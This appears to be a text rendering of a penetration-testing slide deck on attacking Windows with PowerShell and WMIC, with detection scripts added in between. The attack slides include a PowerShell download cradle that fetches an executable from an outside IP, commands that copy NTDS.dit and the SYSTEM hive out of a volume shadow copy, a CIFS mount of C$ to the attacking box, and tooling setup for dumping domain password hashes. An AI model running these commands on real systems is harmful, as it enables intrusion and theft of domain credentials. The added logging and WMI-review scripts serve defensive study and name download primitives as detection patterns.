This deck covers a range of techniques that leverage PowerShell to attack Windows systems in different ways. It is an interesting agglomeration of combined methods for plundering a Windows box.
3. Powershell Fundamentals
PowerShell is a command-line and scripting language framework for task automation and configuration management. For the Windows pen tester of today, it's a comprehensive and powerful tool in your arsenal that just so happens to be installed on all of your victim PCs.
4. What is Powershell?
When I described PowerShell as a task automation and configuration management framework, that's more along the lines of Microsoft's definition of PowerShell. As hackers, we think of what things can do, not necessarily how their creators defined them; in that sense, PowerShell is the Windows command line on steroids.
5. Powershell Cmdlets
A cmdlet is really just a command, at least conceptually; behind the scenes, cmdlets are .NET classes that implement particular functionality. They're the native body of commands within PowerShell and they use a unique, self-explanatory syntax style: Verb-Noun.
7. ICMP Enum
So, you have your foothold on a Windows box. Setting aside the possibility of uploading our own tools, can we use a plain off-the-shelf copy of Windows to poke around for a potential next stepping stone? With PowerShell, there isn't much we can't do.
12. Delivering a Trojan to your target via PowerShell
> (New-Object System.Net.WebClient).DownloadFile("http://192.168.63.143/attack1.exe", "c:\windows\temp\attack1.exe")
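The download cradle above never has to write a script to disk, so the place a defender catches it is PowerShell script block logging. The following is an added example, not part of the original deck: it switches script block logging on through the standard policy key and then scans Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log for the WebClient download primitives used on this slide. The pattern list is an assumption to extend for your own environment.

```powershell
# Added example (not from the original deck). Assumptions: run elevated on the
# host being reviewed; the registry policy path, the log name and the 4104
# event layout are the standard Windows ones.

# 1. Make sure script block logging is on, so that cradles like the one above
#    are recorded even when they never touch disk.
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
if (-not (Test-Path $policy)) { New-Item -Path $policy -Force | Out-Null }
Set-ItemProperty -Path $policy -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 2. Download primitives worth reviewing; extend the list for your environment.
$patterns = 'DownloadFile', 'DownloadString', 'Net.WebClient', 'Invoke-WebRequest', 'Start-BitsTransfer'

# 3. Pull every logged script block (Event ID 4104) and report the ones that
#    contain a pattern, with a flattened snippet for triage.
$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'
    Id      = 4104
} -ErrorAction SilentlyContinue

foreach ($e in $events) {
    $text = [string]$e.Properties[2].Value      # Properties[2] = ScriptBlockText
    if (-not $text) { continue }
    foreach ($p in $patterns) {
        if ($text -match [regex]::Escape($p)) {
            $flat = $text -replace '\s+', ' '
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Pattern = $p
                Snippet = $flat.Substring(0, [Math]::Min(120, $flat.Length))
            }
            break
        }
    }
}
```

Script block logging records the de-obfuscated block as PowerShell actually compiles it, which is why the match works even when the cradle on the slide is wrapped in string concatenation or encoding before it runs.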
13. Named pipes and security
Concepts
The named pipe concept gives the pipe a name, and by having a name it utilizes the filesystem, so that interacting with it is like interacting with a file. Remember the purpose of our pipelines: to take the output of one command and pipe it as input to another command.
14. Named pipes, although they work a lot like files, cannot actually be mounted in the filesystem. They have their own namespace and are referenced as \\.\pipe\[name]. There are functions available to the software developer to work with named pipes (for example CreateFile, WriteFile and CloseHandle).
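To make the two slides above concrete, here is an added example (not from the original deck) that first enumerates the \\.\pipe\ namespace, which is how a defender inventories the pipes present on a host, and then creates a pipe from PowerShell with the .NET System.IO.Pipes classes and exchanges one line over it, using exactly the StreamReader/StreamWriter calls you would use on a file. The pipe name demo-editor-pipe is constructed for the example.

```powershell
# Added example (not from the original deck). Assumption: the pipe name
# 'demo-editor-pipe' is constructed for this demonstration; the \\.\pipe\
# namespace and the System.IO.Pipes classes are standard Windows/.NET.

# 1. Inventory: the pipe namespace enumerates like a directory, which is how a
#    defender can spot unexpected pipes (many tools expose themselves this way).
$pipes = [System.IO.Directory]::GetFiles('\\.\pipe\')
"{0} named pipes present; first five:" -f $pipes.Count
$pipes | Select-Object -First 5

# 2. Server side, in a background job: create the pipe, wait for one client,
#    read a line and answer it. ReadLine/WriteLine are the same stream API
#    used for ordinary files.
$server = Start-Job -ScriptBlock {
    $srv = [System.IO.Pipes.NamedPipeServerStream]::new('demo-editor-pipe', [System.IO.Pipes.PipeDirection]::InOut)
    $srv.WaitForConnection()
    $reader = [System.IO.StreamReader]::new($srv)
    $writer = [System.IO.StreamWriter]::new($srv)
    $writer.AutoFlush = $true
    $line = $reader.ReadLine()
    $writer.WriteLine("server got: $line")
    $srv.WaitForPipeDrain()
    $srv.Dispose()
}

# 3. Client side: open \\.\pipe\demo-editor-pipe on the local machine ('.') and
#    exchange one line with the server.
$cli = [System.IO.Pipes.NamedPipeClientStream]::new('.', 'demo-editor-pipe', [System.IO.Pipes.PipeDirection]::InOut)
$cli.Connect(5000)                      # wait up to 5 s for the server job to create the pipe
$w = [System.IO.StreamWriter]::new($cli); $w.AutoFlush = $true
$r = [System.IO.StreamReader]::new($cli)
$w.WriteLine('hello over \\.\pipe\demo-editor-pipe')
$r.ReadLine()
$cli.Dispose()
Receive-Job -Job $server -Wait -AutoRemoveJob
```

A pipe created this way inherits a default DACL; a server that needs to restrict who may connect passes a PipeSecurity object to the NamedPipeServerStream constructor, which is the check to look for when reviewing services that expose pipes.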
16. WMIC
WMIC is the name of a tool and it stands for Windows Management Instrumentation Command.
17. The tool allows us to perform WMI operations. WMI is the Windows infrastructure for operations and management data. In addition to providing management data to other parts of Windows and other products altogether, it's possible to automate administrative tasks both locally and remotely with WMI scripts and applications.
18. WMIC commands fired off at the command line leave no traces of software or code lying around. While WMI activity can be logged, many organizations fail to turn it on or review the logs.
In almost any Windows environment, WMI and PowerShell can't be blocked.
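Since the slide's point is that WMI logging is usually off and unreviewed, here is an added example (not from the original deck) of turning it on and reviewing it. It enables the Microsoft-Windows-WMI-Activity/Operational log with wevtutil, lists permanent event subscriptions both from the log (Event ID 5861) and directly from the root\subscription namespace, and pulls failed operations (Event ID 5858) whose ClientMachine is not the local host. The event IDs and log name are standard Windows values; running elevated is assumed.

```powershell
# Added example (not from the original deck). Assumptions: run elevated; the
# log name, the root\subscription namespace and event IDs 5861/5858 are the
# standard Windows ones.

$log = 'Microsoft-Windows-WMI-Activity/Operational'
wevtutil.exe sl $log /e:true          # enable the log; it is often disabled by default

# 5861: a permanent WMI event consumer binding was created, the classic WMI
# persistence mechanism. Report when it happened and the full message.
Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 5861 } -ErrorAction SilentlyContinue |
    ForEach-Object {
        [pscustomobject]@{ Time = $_.TimeCreated; Detail = $_.Message }
    }

# Independently of the log, ask WMI itself which permanent subscriptions exist
# right now; a clean host normally has none outside of a few Microsoft ones.
Get-CimInstance -Namespace 'root\subscription' -ClassName __FilterToConsumerBinding |
    Select-Object Filter, Consumer

# 5858 records failed WMI operations and names the caller. Surface the ones
# that came from another machine, i.e. remote WMI activity against this host.
Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 5858 } -MaxEvents 200 -ErrorAction SilentlyContinue |
    ForEach-Object {
        if ($_.Message -match 'ClientMachine = ([^;]+);') {
            $client = $Matches[1].Trim()
            if ($client -ne $env:COMPUTERNAME) {
                [pscustomobject]@{ Time = $_.TimeCreated; Client = $client; Detail = $_.Message }
            }
        }
    }
```

The second query is the one to schedule: a binding that pairs an __EventFilter with a CommandLineEventConsumer or ActiveScriptEventConsumer runs code whenever the filter fires, and it survives reboots without any file on disk.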
25. The NTDS database is stored in the NTDS directory under Windows, and you'll find SYSTEM inside the system32\config folder.
26. Creating a copy of the shadow file to retrieve by the attacking box
> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\system32\config\SYSTEM c:\
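The copy commands above depend on a volume shadow copy already existing, and the path they use is the DeviceObject of a Win32_ShadowCopy instance. The following added example (not from the original deck) shows what a domain controller owner would check: which shadow copies exist and which device path each maps to, and which processes created or touched them according to Security Event ID 4688. It assumes command-line auditing ("Include command line in process creation events") is enabled and that it runs elevated; the tool list is an assumption to adjust.

```powershell
# Added example (not from the original deck). Assumptions: run elevated;
# command-line auditing is enabled so that 4688 carries the CommandLine field;
# the Win32_ShadowCopy class and the 4688 property layout are standard Windows.

# 1. Which shadow copies exist right now, and the \\?\GLOBALROOT\Device\...
#    path each one is reachable through (the path the copy command uses).
Get-CimInstance -ClassName Win32_ShadowCopy |
    Select-Object ID, InstallDate, VolumeName, DeviceObject, ClientAccessible

# 2. Process-creation events for the tooling that creates or reads shadow
#    copies. Unexpected runs on a domain controller deserve a look.
$tools = 'vssadmin.exe', 'diskshadow.exe', 'ntdsutil.exe', 'wbadmin.exe'

Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -ErrorAction SilentlyContinue |
    ForEach-Object {
        # 4688 layout: Properties[5] = NewProcessName, Properties[8] = CommandLine
        if ($_.Properties.Count -le 8) { return }
        $proc = [string]$_.Properties[5].Value
        $cmd  = [string]$_.Properties[8].Value
        foreach ($t in $tools) {
            if ($proc -like "*\$t") {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    Process     = $proc
                    CommandLine = $cmd
                }
            }
        }
    }
```

The InstallDate column of the first query is the quick sanity check: a shadow copy that was not created by the backup schedule is the artifact the copy command on this slide leaves behind.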
28. Mount the filesystem to the attacking box
mount -t cifs //<IP>/C$ -o username=Administrator /root/mount/
29. Password hash extraction with libesedb and ntdsxtract
# git clone https://github.com/libyal/libesedb
# git clone https://github.com/csababarta/ntdsxtract
# cd libesedb
# apt-get install git autoconf automake autopoint libtool pkg-config build-essential
# ./synclibs.sh
# ./autogen.sh
# chmod +x configure
# ./configure
# make
# make install
# ldconfig
30. Exporting all the tables from the NTDS database
# esedbexport -m tables ntds.dit
31. Where's the hash?
We can pass the data table and link table to the dsusers Python script, along with the location of the SYSTEM hive (which contains the SYSKEY), and ask the script to nicely format our hashes into a cracker-friendly format: